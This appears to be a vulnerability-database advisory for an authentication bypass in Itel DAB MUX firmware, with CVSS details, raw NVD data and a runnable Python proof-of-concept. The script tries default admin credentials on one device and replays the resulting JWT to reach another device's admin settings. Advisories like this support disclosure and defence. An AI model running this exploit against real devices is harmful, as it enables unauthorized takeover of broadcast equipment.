Security Vulnerability Report
中文
CVE-2025-63217 CVSS 9.8 CRITICAL

CVE-2025-63217

Published: 2025-11-18 22:15:52
Last Modified: 2026-01-15 21:57:15
Source: [email protected]

Description

The Itel DAB MUX (IDMUX build c041640a) is vulnerable to Authentication Bypass due to improper JWT validation across devices. Attackers can reuse a valid JWT token obtained from one device to authenticate and gain administrative access to any other device running the same firmware, even if the passwords and networks are different. This allows full compromise of affected devices.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:itel:id_mux_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:itel:id_mux:-:*:*:*:*:*:*:* - NOT VULNERABLE
Itel DAB MUX IDMUX build c041640a及之前版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-63217 PoC - Itel DAB MUX Authentication Bypass Note: This is for educational and authorized testing purposes only. """ import requests import json import argparse from typing import Dict, Optional class ItelIDMUXExploit: def __init__(self, target_ip: str, source_token: Optional[str] = None): self.target_ip = target_ip self.source_token = source_token self.base_url = f"http://{target_ip}" def get_token_from_device(self, device_ip: str) -> Optional[str]: """Obtain valid JWT token from a source device""" try: # Attempt to get token through login or session endpoint response = requests.post( f"http://{device_ip}/api/login", json={"username": "admin", "password": "admin"}, timeout=10 ) if response.status_code == 200: data = response.json() return data.get('token') or data.get('jwt') except Exception as e: print(f"[-] Failed to get token from {device_ip}: {e}") return None def exploit(self) -> bool: """Execute authentication bypass attack""" token = self.source_token if not token: print("[-] No source token provided. Please provide a valid JWT token.") return False print(f"[*] Using JWT token: {token[:50]}...") print(f"[*] Targeting device: {self.target_ip}") # Attempt to access admin endpoint with the token headers = { 'Authorization': f'Bearer {token}', 'Content-Type': 'application/json' } try: # Try accessing protected admin endpoint response = requests.get( f"{self.base_url}/api/admin/settings", headers=headers, timeout=10 ) if response.status_code == 200: print("[+] SUCCESS: Authentication bypass worked!") print(f"[+] Response: {response.text[:500]}") return True else: print(f"[-] Failed: Status code {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False def main(): parser = argparse.ArgumentParser(description='CVE-2025-63217 PoC') parser.add_argument('--target', required=True, help='Target device IP') parser.add_argument('--token', help='JWT token from source device') parser.add_argument('--source-ip', help='Source device IP to extract token') args = parser.parse_args() exploit = ItelIDMUXExploit(args.target, args.token) if not args.token and args.source_ip: print(f"[*] Obtaining token from source device: {args.source_ip}") token = exploit.get_token_from_device(args.source_ip) if token: exploit.source_token = token result = exploit.exploit() exit(0 if result else 1) if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63217", "sourceIdentifier": "[email protected]", "published": "2025-11-18T22:15:51.750", "lastModified": "2026-01-15T21:57:14.860", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Itel DAB MUX (IDMUX build c041640a) is vulnerable to Authentication Bypass due to improper JWT validation across devices. Attackers can reuse a valid JWT token obtained from one device to authenticate and gain administrative access to any other device running the same firmware, even if the passwords and networks are different. This allows full compromise of affected devices."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:itel:id_mux_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "25B5C5E3-1BFD-4DDC-A112-BDF2D6532167"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:itel:id_mux:-:*:*:*:*:*:*:*", "matchCriteriaId": "8E6E4166-E308-4AD7-9A02-0B0DB64E68CD"}]}]}], "references": [{"url": "https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63217%20_%20Itel%20DAB%20MUX%20Authentication%20Bypass", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.itel.it/", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.